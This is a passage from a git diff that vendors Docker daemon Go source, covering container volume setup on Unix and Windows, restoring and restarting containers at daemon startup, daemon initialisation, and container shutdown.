+						return apierrors.NewBadRequestError(fmt.Errorf("invalid IPv6 address: %s", v.IPAMConfig.IPv6Address))
+					}
+				}
+			}
+		}
+		return nil
+	}
+	l := make([]string, 0, len(nwConfig.EndpointsConfig))
+	for k := range nwConfig.EndpointsConfig {
+		l = append(l, k)
+	}
+	err := fmt.Errorf("Container cannot be connected to network endpoints: %s", strings.Join(l, ", "))
+	return apierrors.NewBadRequestError(err)
+}
diff --git a/vendor/github.com/docker/docker/daemon/create_unix.go b/vendor/github.com/docker/docker/daemon/create_unix.go
new file mode 100644
index 0000000000..2fe5c98a79
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/create_unix.go
@@ -0,0 +1,81 @@
+// +build !windows
+
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/Sirupsen/logrus"
+	containertypes "github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+// createContainerPlatformSpecificSettings performs platform specific container create functionality
+func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error {
+	if err := daemon.Mount(container); err != nil {
+		return err
+	}
+	defer daemon.Unmount(container)
+
+	rootUID, rootGID := daemon.GetRemappedUIDGID()
+	if err := container.SetupWorkingDirectory(rootUID, rootGID); err != nil {
+		return err
+	}
+
+	for spec := range config.Volumes {
+		name := stringid.GenerateNonCryptoID()
+		destination := filepath.Clean(spec)
+
+		// Skip volumes for which we already have something mounted on that
+		// destination because of a --volume-from.
+		if container.IsDestinationMounted(destination) {
+			continue
+		}
+		path, err := container.GetResourcePath(destination)
+		if err != nil {
+			return err
+		}
+
+		stat, err := os.Stat(path)
+		if err == nil && !stat.IsDir() {
+			return fmt.Errorf("cannot mount volume over existing file, file exists %s", path)
+		}
+
+		v, err := daemon.volumes.CreateWithRef(name, hostConfig.VolumeDriver, container.ID, nil, nil)
+		if err != nil {
+			return err
+		}
+
+		if err := label.Relabel(v.Path(), container.MountLabel, true); err != nil {
+			return err
+		}
+
+		container.AddMountPointWithVolume(destination, v, true)
+	}
+	return daemon.populateVolumes(container)
+}
+
+// populateVolumes copies data from the container's rootfs into the volume for non-binds.
+// this is only called when the container is created.
+func (daemon *Daemon) populateVolumes(c *container.Container) error {
+	for _, mnt := range c.MountPoints {
+		if mnt.Volume == nil {
+			continue
+		}
+
+		if mnt.Type != mounttypes.TypeVolume || !mnt.CopyData {
+			continue
+		}
+
+		logrus.Debugf("copying image data from %s:%s, to %s", c.ID, mnt.Destination, mnt.Name)
+		if err := c.CopyImagePathContent(mnt.Volume, mnt.Destination); err != nil {
+			return err
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/create_windows.go b/vendor/github.com/docker/docker/daemon/create_windows.go
new file mode 100644
index 0000000000..bbf0dbe7b9
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/create_windows.go
@@ -0,0 +1,80 @@
+package daemon
+
+import (
+	"fmt"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/volume"
+)
+
+// createContainerPlatformSpecificSettings performs platform specific container create functionality
+func (daemon *Daemon) createContainerPlatformSpecificSettings(container *container.Container, config *containertypes.Config, hostConfig *containertypes.HostConfig) error {
+	// Make sure the host config has the default daemon isolation if not specified by caller.
+	if containertypes.Isolation.IsDefault(containertypes.Isolation(hostConfig.Isolation)) {
+		hostConfig.Isolation = daemon.defaultIsolation
+	}
+
+	for spec := range config.Volumes {
+
+		mp, err := volume.ParseMountRaw(spec, hostConfig.VolumeDriver)
+		if err != nil {
+			return fmt.Errorf("Unrecognised volume spec: %v", err)
+		}
+
+		// If the mountpoint doesn't have a name, generate one.
+		if len(mp.Name) == 0 {
+			mp.Name = stringid.GenerateNonCryptoID()
+		}
+
+		// Skip volumes for which we already have something mounted on that
+		// destination because of a --volume-from.
+		if container.IsDestinationMounted(mp.Destination) {
+			continue
+		}
+
+		volumeDriver := hostConfig.VolumeDriver
+
+		// Create the volume in the volume driver. If it doesn't exist,
+		// a new one will be created.
+		v, err := daemon.volumes.CreateWithRef(mp.Name, volumeDriver, container.ID, nil, nil)
+		if err != nil {
+			return err
+		}
+
+		// FIXME Windows: This code block is present in the Linux version and
+		// allows the contents to be copied to the container FS prior to it
+		// being started. However, the function utilizes the FollowSymLinkInScope
+		// path which does not cope with Windows volume-style file paths. There
+		// is a separate effort to resolve this (@swernli), so this processing
+		// is deferred for now. A case where this would be useful is when
+		// a dockerfile includes a VOLUME statement, but something is created
+		// in that directory during the dockerfile processing. What this means
+		// on Windows for TP5 is that in that scenario, the contents will not
+		// copied, but that's (somewhat) OK as HCS will bomb out soon after
+		// at it doesn't support mapped directories which have contents in the
+		// destination path anyway.
+		//
+		// Example for repro later:
+		//   FROM windowsservercore
+		//   RUN mkdir c:\myvol
+		//   RUN copy c:\windows\system32\ntdll.dll c:\myvol
+		//   VOLUME "c:\myvol"
+		//
+		// Then
+		//   docker build -t vol .
+		//   docker run -it --rm vol cmd  <-- This is where HCS will error out.
+		//
+		//	// never attempt to copy existing content in a container FS to a shared volume
+		//	if v.DriverName() == volume.DefaultDriverName {
+		//		if err := container.CopyImagePathContent(v, mp.Destination); err != nil {
+		//			return err
+		//		}
+		//	}
+
+		// Add it to container.MountPoints
+		container.AddMountPointWithVolume(mp.Destination, v, mp.RW)
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon.go b/vendor/github.com/docker/docker/daemon/daemon.go
new file mode 100644
index 0000000000..55a66aec92
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon.go
@@ -0,0 +1,1321 @@
+// Package daemon exposes the functions that occur on the host server
+// that the Docker daemon is running.
+//
+// In implementing the various functions of the daemon, there is often
+// a method-specific struct for configuring the runtime behavior.
+package daemon
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net"
+	"os"
+	"path"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	containerd "github.com/docker/containerd/api/grpc/types"
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/events"
+	"github.com/docker/docker/daemon/exec"
+	"github.com/docker/docker/daemon/initlayer"
+	"github.com/docker/docker/dockerversion"
+	"github.com/docker/docker/plugin"
+	"github.com/docker/libnetwork/cluster"
+	// register graph drivers
+	_ "github.com/docker/docker/daemon/graphdriver/register"
+	dmetadata "github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/libcontainerd"
+	"github.com/docker/docker/migrate/v1"
+	"github.com/docker/docker/pkg/fileutils"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/registrar"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/pkg/truncindex"
+	"github.com/docker/docker/reference"
+	"github.com/docker/docker/registry"
+	"github.com/docker/docker/runconfig"
+	volumedrivers "github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/local"
+	"github.com/docker/docker/volume/store"
+	"github.com/docker/libnetwork"
+	nwconfig "github.com/docker/libnetwork/config"
+	"github.com/docker/libtrust"
+	"github.com/pkg/errors"
+)
+
+var (
+	// DefaultRuntimeBinary is the default runtime to be used by
+	// containerd if none is specified
+	DefaultRuntimeBinary = "docker-runc"
+
+	// DefaultInitBinary is the name of the default init binary
+	DefaultInitBinary = "docker-init"
+
+	errSystemNotSupported = fmt.Errorf("The Docker daemon is not supported on this platform.")
+)
+
+// Daemon holds information about the Docker daemon.
+type Daemon struct {
+	ID                        string
+	repository                string
+	containers                container.Store
+	execCommands              *exec.Store
+	referenceStore            reference.Store
+	downloadManager           *xfer.LayerDownloadManager
+	uploadManager             *xfer.LayerUploadManager
+	distributionMetadataStore dmetadata.Store
+	trustKey                  libtrust.PrivateKey
+	idIndex                   *truncindex.TruncIndex
+	configStore               *Config
+	statsCollector            *statsCollector
+	defaultLogConfig          containertypes.LogConfig
+	RegistryService           registry.Service
+	EventsService             *events.Events
+	netController             libnetwork.NetworkController
+	volumes                   *store.VolumeStore
+	discoveryWatcher          discoveryReloader
+	root                      string
+	seccompEnabled            bool
+	shutdown                  bool
+	uidMaps                   []idtools.IDMap
+	gidMaps                   []idtools.IDMap
+	layerStore                layer.Store
+	imageStore                image.Store
+	PluginStore               *plugin.Store // todo: remove
+	pluginManager             *plugin.Manager
+	nameIndex                 *registrar.Registrar
+	linkIndex                 *linkIndex
+	containerd                libcontainerd.Client
+	containerdRemote          libcontainerd.Remote
+	defaultIsolation          containertypes.Isolation // Default isolation mode on Windows
+	clusterProvider           cluster.Provider
+	cluster                   Cluster
+
+	seccompProfile     []byte
+	seccompProfilePath string
+}
+
+// HasExperimental returns whether the experimental features of the daemon are enabled or not
+func (daemon *Daemon) HasExperimental() bool {
+	if daemon.configStore != nil && daemon.configStore.Experimental {
+		return true
+	}
+	return false
+}
+
+func (daemon *Daemon) restore() error {
+	var (
+		currentDriver = daemon.GraphDriverName()
+		containers    = make(map[string]*container.Container)
+	)
+
+	logrus.Info("Loading containers: start.")
+
+	dir, err := ioutil.ReadDir(daemon.repository)
+	if err != nil {
+		return err
+	}
+
+	for _, v := range dir {
+		id := v.Name()
+		container, err := daemon.load(id)
+		if err != nil {
+			logrus.Errorf("Failed to load container %v: %v", id, err)
+			continue
+		}
+
+		// Ignore the container if it does not support the current driver being used by the graph
+		if (container.Driver == "" && currentDriver == "aufs") || container.Driver == currentDriver {
+			rwlayer, err := daemon.layerStore.GetRWLayer(container.ID)
+			if err != nil {
+				logrus.Errorf("Failed to load container mount %v: %v", id, err)
+				continue
+			}
+			container.RWLayer = rwlayer
+			logrus.Debugf("Loaded container %v", container.ID)
+
+			containers[container.ID] = container
+		} else {
+			logrus.Debugf("Cannot load container %s because it was created with another graph driver.", container.ID)
+		}
+	}
+
+	removeContainers := make(map[string]*container.Container)
+	restartContainers := make(map[*container.Container]chan struct{})
+	activeSandboxes := make(map[string]interface{})
+	for id, c := range containers {
+		if err := daemon.registerName(c); err != nil {
+			logrus.Errorf("Failed to register container %s: %s", c.ID, err)
+			delete(containers, id)
+			continue
+		}
+		if err := daemon.Register(c); err != nil {
+			logrus.Errorf("Failed to register container %s: %s", c.ID, err)
+			delete(containers, id)
+			continue
+		}
+
+		// verify that all volumes valid and have been migrated from the pre-1.7 layout
+		if err := daemon.verifyVolumesInfo(c); err != nil {
+			// don't skip the container due to error
+			logrus.Errorf("Failed to verify volumes for container '%s': %v", c.ID, err)
+		}
+
+		// The LogConfig.Type is empty if the container was created before docker 1.12 with default log driver.
+		// We should rewrite it to use the daemon defaults.
+		// Fixes https://github.com/docker/docker/issues/22536
+		if c.HostConfig.LogConfig.Type == "" {
+			if err := daemon.mergeAndVerifyLogConfig(&c.HostConfig.LogConfig); err != nil {
+				logrus.Errorf("Failed to verify log config for container %s: %q", c.ID, err)
+				continue
+			}
+		}
+	}
+
+	var migrateLegacyLinks bool // Not relevant on Windows
+	var wg sync.WaitGroup
+	var mapLock sync.Mutex
+	for _, c := range containers {
+		wg.Add(1)
+		go func(c *container.Container) {
+			defer wg.Done()
+			if err := backportMountSpec(c); err != nil {
+				logrus.Error("Failed to migrate old mounts to use new spec format")
+			}
+
+			if c.IsRunning() || c.IsPaused() {
+				c.RestartManager().Cancel() // manually start containers because some need to wait for swarm networking
+				if err := daemon.containerd.Restore(c.ID, c.InitializeStdio); err != nil {
+					logrus.Errorf("Failed to restore %s with containerd: %s", c.ID, err)
+					return
+				}
+
+				// we call Mount and then Unmount to get BaseFs of the container
+				if err := daemon.Mount(c); err != nil {
+					// The mount is unlikely to fail. However, in case mount fails
+					// the container should be allowed to restore here. Some functionalities
+					// (like docker exec -u user) might be missing but container is able to be
+					// stopped/restarted/removed.
+					// See #29365 for related information.
+					// The error is only logged here.
+					logrus.Warnf("Failed to mount container on getting BaseFs path %v: %v", c.ID, err)
+				} else {
+					// if mount success, then unmount it
+					if err := daemon.Unmount(c); err != nil {
+						logrus.Warnf("Failed to umount container on getting BaseFs path %v: %v", c.ID, err)
+					}
+				}
+
+				c.ResetRestartManager(false)
+				if !c.HostConfig.NetworkMode.IsContainer() && c.IsRunning() {
+					options, err := daemon.buildSandboxOptions(c)
+					if err != nil {
+						logrus.Warnf("Failed build sandbox option to restore container %s: %v", c.ID, err)
+					}
+					mapLock.Lock()
+					activeSandboxes[c.NetworkSettings.SandboxID] = options
+					mapLock.Unlock()
+				}
+
+			}
+			// fixme: only if not running
+			// get list of containers we need to restart
+			if !c.IsRunning() && !c.IsPaused() {
+				// Do not autostart containers which
+				// has endpoints in a swarm scope
+				// network yet since the cluster is
+				// not initialized yet. We will start
+				// it after the cluster is
+				// initialized.
+				if daemon.configStore.AutoRestart && c.ShouldRestart() && !c.NetworkSettings.HasSwarmEndpoint {
+					mapLock.Lock()
+					restartContainers[c] = make(chan struct{})
+					mapLock.Unlock()
+				} else if c.HostConfig != nil && c.HostConfig.AutoRemove {
+					mapLock.Lock()
+					removeContainers[c.ID] = c
+					mapLock.Unlock()
+				}
+			}
+
+			if c.RemovalInProgress {
+				// We probably crashed in the middle of a removal, reset
+				// the flag.
+				//
+				// We DO NOT remove the container here as we do not
+				// know if the user had requested for either the
+				// associated volumes, network links or both to also
+				// be removed. So we put the container in the "dead"
+				// state and leave further processing up to them.
+				logrus.Debugf("Resetting RemovalInProgress flag from %v", c.ID)
+				c.ResetRemovalInProgress()
+				c.SetDead()
+				c.ToDisk()
+			}
+
+			// if c.hostConfig.Links is nil (not just empty), then it is using the old sqlite links and needs to be migrated
+			if c.HostConfig != nil && c.HostConfig.Links == nil {
+				migrateLegacyLinks = true
+			}
+		}(c)
+	}
+	wg.Wait()
+	daemon.netController, err = daemon.initNetworkController(daemon.configStore, activeSandboxes)
+	if err != nil {
+		return fmt.Errorf("Error initializing network controller: %v", err)
+	}
+
+	// Perform migration of legacy sqlite links (no-op on Windows)
+	if migrateLegacyLinks {
+		if err := daemon.sqliteMigration(containers); err != nil {
+			return err
+		}
+	}
+
+	// Now that all the containers are registered, register the links
+	for _, c := range containers {
+		if err := daemon.registerLinks(c, c.HostConfig); err != nil {
+			logrus.Errorf("failed to register link for container %s: %v", c.ID, err)
+		}
+	}
+
+	group := sync.WaitGroup{}
+	for c, notifier := range restartContainers {
+		group.Add(1)
+
+		go func(c *container.Container, chNotify chan struct{}) {
+			defer group.Done()
+
+			logrus.Debugf("Starting container %s", c.ID)
+
+			// ignore errors here as this is a best effort to wait for children to be
+			//   running before we try to start the container
+			children := daemon.children(c)
+			timeout := time.After(5 * time.Second)
+			for _, child := range children {
+				if notifier, exists := restartContainers[child]; exists {
+					select {
+					case <-notifier:
+					case <-timeout:
+					}
+				}
+			}
+
+			// Make sure networks are available before starting
+			daemon.waitForNetworks(c)
+			if err := daemon.containerStart(c, "", "", true); err != nil {
+				logrus.Errorf("Failed to start container %s: %s", c.ID, err)
+			}
+			close(chNotify)
+		}(c, notifier)
+
+	}
+	group.Wait()
+
+	removeGroup := sync.WaitGroup{}
+	for id := range removeContainers {
+		removeGroup.Add(1)
+		go func(cid string) {
+			if err := daemon.ContainerRm(cid, &types.ContainerRmConfig{ForceRemove: true, RemoveVolume: true}); err != nil {
+				logrus.Errorf("Failed to remove container %s: %s", cid, err)
+			}
+			removeGroup.Done()
+		}(id)
+	}
+	removeGroup.Wait()
+
+	// any containers that were started above would already have had this done,
+	// however we need to now prepare the mountpoints for the rest of the containers as well.
+	// This shouldn't cause any issue running on the containers that already had this run.
+	// This must be run after any containers with a restart policy so that containerized plugins
+	// can have a chance to be running before we try to initialize them.
+	for _, c := range containers {
+		// if the container has restart policy, do not
+		// prepare the mountpoints since it has been done on restarting.
+		// This is to speed up the daemon start when a restart container
+		// has a volume and the volume dirver is not available.
+		if _, ok := restartContainers[c]; ok {
+			continue
+		} else if _, ok := removeContainers[c.ID]; ok {
+			// container is automatically removed, skip it.
+			continue
+		}
+
+		group.Add(1)
+		go func(c *container.Container) {
+			defer group.Done()
+			if err := daemon.prepareMountPoints(c); err != nil {
+				logrus.Error(err)
+			}
+		}(c)
+	}
+
+	group.Wait()
+
+	logrus.Info("Loading containers: done.")
+
+	return nil
+}
+
+// RestartSwarmContainers restarts any autostart container which has a
+// swarm endpoint.
+func (daemon *Daemon) RestartSwarmContainers() {
+	group := sync.WaitGroup{}
+	for _, c := range daemon.List() {
+		if !c.IsRunning() && !c.IsPaused() {
+			// Autostart all the containers which has a
+			// swarm endpoint now that the cluster is
+			// initialized.
+			if daemon.configStore.AutoRestart && c.ShouldRestart() && c.NetworkSettings.HasSwarmEndpoint {
+				group.Add(1)
+				go func(c *container.Container) {
+					defer group.Done()
+					if err := daemon.containerStart(c, "", "", true); err != nil {
+						logrus.Error(err)
+					}
+				}(c)
+			}
+		}
+
+	}
+	group.Wait()
+}
+
+// waitForNetworks is used during daemon initialization when starting up containers
+// It ensures that all of a container's networks are available before the daemon tries to start the container.
+// In practice it just makes sure the discovery service is available for containers which use a network that require discovery.
+func (daemon *Daemon) waitForNetworks(c *container.Container) {
+	if daemon.discoveryWatcher == nil {
+		return
+	}
+	// Make sure if the container has a network that requires discovery that the discovery service is available before starting
+	for netName := range c.NetworkSettings.Networks {
+		// If we get `ErrNoSuchNetwork` here, we can assume that it is due to discovery not being ready
+		// Most likely this is because the K/V store used for discovery is in a container and needs to be started
+		if _, err := daemon.netController.NetworkByName(netName); err != nil {
+			if _, ok := err.(libnetwork.ErrNoSuchNetwork); !ok {
+				continue
+			}
+			// use a longish timeout here due to some slowdowns in libnetwork if the k/v store is on anything other than --net=host
+			// FIXME: why is this slow???
+			logrus.Debugf("Container %s waiting for network to be ready", c.Name)
+			select {
+			case <-daemon.discoveryWatcher.ReadyCh():
+			case <-time.After(60 * time.Second):
+			}
+			return
+		}
+	}
+}
+
+func (daemon *Daemon) children(c *container.Container) map[string]*container.Container {
+	return daemon.linkIndex.children(c)
+}
+
+// parents returns the names of the parent containers of the container
+// with the given name.
+func (daemon *Daemon) parents(c *container.Container) map[string]*container.Container {
+	return daemon.linkIndex.parents(c)
+}
+
+func (daemon *Daemon) registerLink(parent, child *container.Container, alias string) error {
+	fullName := path.Join(parent.Name, alias)
+	if err := daemon.nameIndex.Reserve(fullName, child.ID); err != nil {
+		if err == registrar.ErrNameReserved {
+			logrus.Warnf("error registering link for %s, to %s, as alias %s, ignoring: %v", parent.ID, child.ID, alias, err)
+			return nil
+		}
+		return err
+	}
+	daemon.linkIndex.link(parent, child, fullName)
+	return nil
+}
+
+// DaemonJoinsCluster informs the daemon has joined the cluster and provides
+// the handler to query the cluster component
+func (daemon *Daemon) DaemonJoinsCluster(clusterProvider cluster.Provider) {
+	daemon.setClusterProvider(clusterProvider)
+}
+
+// DaemonLeavesCluster informs the daemon has left the cluster
+func (daemon *Daemon) DaemonLeavesCluster() {
+	// Daemon is in charge of removing the attachable networks with
+	// connected containers when the node leaves the swarm
+	daemon.clearAttachableNetworks()
+	daemon.setClusterProvider(nil)
+}
+
+// setClusterProvider sets a component for querying the current cluster state.
+func (daemon *Daemon) setClusterProvider(clusterProvider cluster.Provider) {
+	daemon.clusterProvider = clusterProvider
+	// call this in a goroutine to allow netcontroller handle this event async
+	// and not block if it is in the middle of talking with cluster
+	go daemon.netController.SetClusterProvider(clusterProvider)
+}
+
+// IsSwarmCompatible verifies if the current daemon
+// configuration is compatible with the swarm mode
+func (daemon *Daemon) IsSwarmCompatible() error {
+	if daemon.configStore == nil {
+		return nil
+	}
+	return daemon.configStore.isSwarmCompatible()
+}
+
+// NewDaemon sets up everything for the daemon to be able to service
+// requests from the webserver.
+func NewDaemon(config *Config, registryService registry.Service, containerdRemote libcontainerd.Remote) (daemon *Daemon, err error) {
+	setDefaultMtu(config)
+
+	// Ensure that we have a correct root key limit for launching containers.
+	if err := ModifyRootKeyLimit(); err != nil {
+		logrus.Warnf("unable to modify root key limit, number of containers could be limited by this quota: %v", err)
+	}
+
+	// Ensure we have compatible and valid configuration options
+	if err := verifyDaemonSettings(config); err != nil {
+		return nil, err
+	}
+
+	// Do we have a disabled network?
+	config.DisableBridge = isBridgeNetworkDisabled(config)
+
+	// Verify the platform is supported as a daemon
+	if !platformSupported {
+		return nil, errSystemNotSupported
+	}
+
+	// Validate platform-specific requirements
+	if err := checkSystem(); err != nil {
+		return nil, err
+	}
+
+	uidMaps, gidMaps, err := setupRemappedRoot(config)
+	if err != nil {
+		return nil, err
+	}
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := setupDaemonProcess(config); err != nil {
+		return nil, err
+	}
+
+	// set up the tmpDir to use a canonical path
+	tmp, err := tempDir(config.Root, rootUID, rootGID)
+	if err != nil {
+		return nil, fmt.Errorf("Unable to get the TempDir under %s: %s", config.Root, err)
+	}
+	realTmp, err := fileutils.ReadSymlinkedDirectory(tmp)
+	if err != nil {
+		return nil, fmt.Errorf("Unable to get the full path to the TempDir (%s): %s", tmp, err)
+	}
+	os.Setenv("TMPDIR", realTmp)
+
+	d := &Daemon{configStore: config}
+	// Ensure the daemon is properly shutdown if there is a failure during
+	// initialization
+	defer func() {
+		if err != nil {
+			if err := d.Shutdown(); err != nil {
+				logrus.Error(err)
+			}
+		}
+	}()
+
+	if err := d.setupSeccompProfile(); err != nil {
+		return nil, err
+	}
+
+	// Set the default isolation mode (only applicable on Windows)
+	if err := d.setDefaultIsolation(); err != nil {
+		return nil, fmt.Errorf("error setting default isolation mode: %v", err)
+	}
+
+	logrus.Debugf("Using default logging driver %s", config.LogConfig.Type)
+
+	if err := configureMaxThreads(config); err != nil {
+		logrus.Warnf("Failed to configure golang's threads limit: %v", err)
+	}
+
+	if err := ensureDefaultAppArmorProfile(); err != nil {
+		logrus.Errorf(err.Error())
+	}
+
+	daemonRepo := filepath.Join(config.Root, "containers")
+	if err := idtools.MkdirAllAs(daemonRepo, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) {
+		return nil, err
+	}
+
+	if runtime.GOOS == "windows" {
+		if err := system.MkdirAll(filepath.Join(config.Root, "credentialspecs"), 0); err != nil && !os.IsExist(err) {
+			return nil, err
+		}
+	}
+
+	driverName := os.Getenv("DOCKER_DRIVER")
+	if driverName == "" {
+		driverName = config.GraphDriver
+	}
+
+	d.RegistryService = registryService
+	d.PluginStore = plugin.NewStore(config.Root) // todo: remove
+	// Plugin system initialization should happen before restore. Do not change order.
+	d.pluginManager, err = plugin.NewManager(plugin.ManagerConfig{
+		Root:               filepath.Join(config.Root, "plugins"),
+		ExecRoot:           "/run/docker/plugins", // possibly needs fixing
+		Store:              d.PluginStore,
+		Executor:           containerdRemote,
+		RegistryService:    registryService,
+		LiveRestoreEnabled: config.LiveRestoreEnabled,
+		LogPluginEvent:     d.LogPluginEvent, // todo: make private
+	})
+	if err != nil {
+		return nil, errors.Wrap(err, "couldn't create plugin manager")
+	}
+
+	d.layerStore, err = layer.NewStoreFromOptions(layer.StoreOptions{
+		StorePath:                 config.Root,
+		MetadataStorePathTemplate: filepath.Join(config.Root, "image", "%s", "layerdb"),
+		GraphDriver:               driverName,
+		GraphDriverOptions:        config.GraphOptions,
+		UIDMaps:                   uidMaps,
+		GIDMaps:                   gidMaps,
+		PluginGetter:              d.PluginStore,
+		ExperimentalEnabled:       config.Experimental,
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	graphDriver := d.layerStore.DriverName()
+	imageRoot := filepath.Join(config.Root, "image", graphDriver)
+
+	// Configure and validate the kernels security support
+	if err := configureKernelSecuritySupport(config, graphDriver); err != nil {
+		return nil, err
+	}
+
+	logrus.Debugf("Max Concurrent Downloads: %d", *config.MaxConcurrentDownloads)
+	d.downloadManager = xfer.NewLayerDownloadManager(d.layerStore, *config.MaxConcurrentDownloads)
+	logrus.Debugf("Max Concurrent Uploads: %d", *config.MaxConcurrentUploads)
+	d.uploadManager = xfer.NewLayerUploadManager(*config.MaxConcurrentUploads)
+
+	ifs, err := image.NewFSStoreBackend(filepath.Join(imageRoot, "imagedb"))
+	if err != nil {
+		return nil, err
+	}
+
+	d.imageStore, err = image.NewImageStore(ifs, d.layerStore)
+	if err != nil {
+		return nil, err
+	}
+
+	// Configure the volumes driver
+	volStore, err := d.configureVolumes(rootUID, rootGID)
+	if err != nil {
+		return nil, err
+	}
+
+	trustKey, err := api.LoadOrCreateTrustKey(config.TrustKeyPath)
+	if err != nil {
+		return nil, err
+	}
+
+	trustDir := filepath.Join(config.Root, "trust")
+
+	if err := system.MkdirAll(trustDir, 0700); err != nil {
+		return nil, err
+	}
+
+	distributionMetadataStore, err := dmetadata.NewFSMetadataStore(filepath.Join(imageRoot, "distribution"))
+	if err != nil {
+		return nil, err
+	}
+
+	eventsService := events.New()
+
+	referenceStore, err := reference.NewReferenceStore(filepath.Join(imageRoot, "repositories.json"))
+	if err != nil {
+		return nil, fmt.Errorf("Couldn't create Tag store repositories: %s", err)
+	}
+
+	migrationStart := time.Now()
+	if err := v1.Migrate(config.Root, graphDriver, d.layerStore, d.imageStore, referenceStore, distributionMetadataStore); err != nil {
+		logrus.Errorf("Graph migration failed: %q. Your old graph data was found to be too inconsistent for upgrading to content-addressable storage. Some of the old data was probably not upgraded. We recommend starting over with a clean storage directory if possible.", err)
+	}
+	logrus.Infof("Graph migration to content-addressability took %.2f seconds", time.Since(migrationStart).Seconds())
+
+	// Discovery is only enabled when the daemon is launched with an address to advertise.  When
+	// initialized, the daemon is registered and we can store the discovery backend as its read-only
+	if err := d.initDiscovery(config); err != nil {
+		return nil, err
+	}
+
+	sysInfo := sysinfo.New(false)
+	// Check if Devices cgroup is mounted, it is hard requirement for container security,
+	// on Linux.
+	if runtime.GOOS == "linux" && !sysInfo.CgroupDevicesEnabled {
+		return nil, fmt.Errorf("Devices cgroup isn't mounted")
+	}
+
+	d.ID = trustKey.PublicKey().KeyID()
+	d.repository = daemonRepo
+	d.containers = container.NewMemoryStore()
+	d.execCommands = exec.NewStore()
+	d.referenceStore = referenceStore
+	d.distributionMetadataStore = distributionMetadataStore
+	d.trustKey = trustKey
+	d.idIndex = truncindex.NewTruncIndex([]string{})
+	d.statsCollector = d.newStatsCollector(1 * time.Second)
+	d.defaultLogConfig = containertypes.LogConfig{
+		Type:   config.LogConfig.Type,
+		Config: config.LogConfig.Config,
+	}
+	d.EventsService = eventsService
+	d.volumes = volStore
+	d.root = config.Root
+	d.uidMaps = uidMaps
+	d.gidMaps = gidMaps
+	d.seccompEnabled = sysInfo.Seccomp
+
+	d.nameIndex = registrar.NewRegistrar()
+	d.linkIndex = newLinkIndex()
+	d.containerdRemote = containerdRemote
+
+	go d.execCommandGC()
+
+	d.containerd, err = containerdRemote.Client(d)
+	if err != nil {
+		return nil, err
+	}
+
+	if err := d.restore(); err != nil {
+		return nil, err
+	}
+
+	// FIXME: this method never returns an error
+	info, _ := d.SystemInfo()
+
+	engineVersion.WithValues(
+		dockerversion.Version,
+		dockerversion.GitCommit,
+		info.Architecture,
+		info.Driver,
+		info.KernelVersion,
+		info.OperatingSystem,
+	).Set(1)
+	engineCpus.Set(float64(info.NCPU))
+	engineMemory.Set(float64(info.MemTotal))
+
+	// set up SIGUSR1 handler on Unix-like systems, or a Win32 global event
+	// on Windows to dump Go routine stacks
+	stackDumpDir := config.Root
+	if execRoot := config.GetExecRoot(); execRoot != "" {
+		stackDumpDir = execRoot
+	}
+	d.setupDumpStackTrap(stackDumpDir)
+
+	return d, nil
+}
+
+func (daemon *Daemon) shutdownContainer(c *container.Container) error {
+	stopTimeout := c.StopTimeout()
+	// TODO(windows): Handle docker restart with paused containers
+	if c.IsPaused() {
+		// To terminate a process in freezer cgroup, we should send
+		// SIGTERM to this process then unfreeze it, and the process will
+		// force to terminate immediately.
+		logrus.Debugf("Found container %s is paused, sending SIGTERM before unpausing it", c.ID)
+		sig, ok := signal.SignalMap["TERM"]
+		if !ok {
+			return fmt.Errorf("System does not support SIGTERM")
+		}
+		if err := daemon.kill(c, int(sig)); err != nil {
+			return fmt.Errorf("sending SIGTERM to container %s with error: %v", c.ID, err)
+		}
+		if err := daemon.containerUnpause(c); err != nil {
+			return fmt.Errorf("Failed to unpause container %s with error: %v", c.ID, err)
+		}
+		if _, err := c.WaitStop(time.Duration(stopTimeout) * time.Second); err != nil {
+			logrus.Debugf("container %s failed to exit in %d second of SIGTERM, sending SIGKILL to force", c.ID, stopTimeout)
+			sig, ok := signal.SignalMap["KILL"]
+			if !ok {
+				return fmt.Errorf("System does not support SIGKILL")
+			}
+			if err := daemon.kill(c, int(sig)); err != nil {
+				logrus.Errorf("Failed to SIGKILL container %s", c.ID)
+			}
+			c.WaitStop(-1 * time.Second)
+			return err
+		}
+	}
+	// If container failed to exit in stopTimeout seconds of SIGTERM, then using the force
+	if err := daemon.containerStop(c, stopTimeout); err != nil {
+		return fmt.Errorf("Failed to stop container %s with error: %v", c.ID, err)
+	}
+
+	c.WaitStop(-1 * time.Second)
+	return nil
+}
+
+// ShutdownTimeout returns the shutdown timeout based on the max stopTimeout of the containers,
+// and is limited by daemon's ShutdownTimeout.
+func (daemon *Daemon) ShutdownTimeout() int {
